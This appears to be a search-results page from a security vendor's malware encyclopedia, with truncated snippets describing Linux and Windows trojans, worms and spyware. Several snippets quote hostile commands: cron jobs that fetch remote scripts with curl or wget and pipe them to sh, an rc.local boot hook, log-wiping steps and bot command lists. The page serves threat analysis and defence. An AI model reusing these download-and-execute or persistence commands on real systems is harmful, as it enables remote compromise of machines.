Search

This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes the initially executed copy of itself.

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications

Modifications This Trojan modifies the following file(s): /etc/rc.local - adds "sh /usr/local/bin/npt" to run downloaded file on boot /var/spool/mail/{user} - contents replaced with "0" string /var/log/wtmp -

This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file

This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Worm arrives on a system as a file

Telnet connections on the following ports: 23 2323 It creates the following cronjob to download and execute 2.sh every 1 hour: * 1 * * * $LDR http://{BLOCKED}.{BLOCKED}.39.78/2.sh | sh > /dev/null

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder

This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder

the server SH <command> - Executes a command ISH <command> - SH, interactive, sends to channel SHD <command> - Executes a psuedo-daemonized command INSTALL <http

\shell HKEY_CURRENT_USER\a01\shell\ open HKEY_CURRENT_USER\a01\shell\ open\command HKEY_CURRENT_USER\a01\shell\ runas HKEY_CURRENT_USER\a01\shell\ runas\command HKEY_CURRENT_USER\SH HKEY_CURRENT_USER\SH

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It modifies files, disabling programs and applications

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder

This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. However, as of this writing, the said sites are

This Trojan deletes itself after execution. Arrival Details This malware arrives via the following means: Downloaded by Trojan.SH.BROOTKIT.A Installation This Trojan adds the following folders:

This Trojan may be downloaded by other malware/grayware from remote sites. Arrival Details This Trojan may be downloaded by the following malware/grayware from remote sites: Trojan.SH.ETIN.A

* * * * (curl -fsSL -m15 lsd.{BLOCKED}ten.org||wget -q -T15 -O- lsd.{BLOCKED}ten.org||python -c 'import urllib;print urllib.urlopen(\"http://lsd.{BLOCKED}ten.org\").read()')|sh Path: /etc/crontab Schedule:

}SIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B Executes the following commands so that it will run upon boot: sudo sh -c "echo '#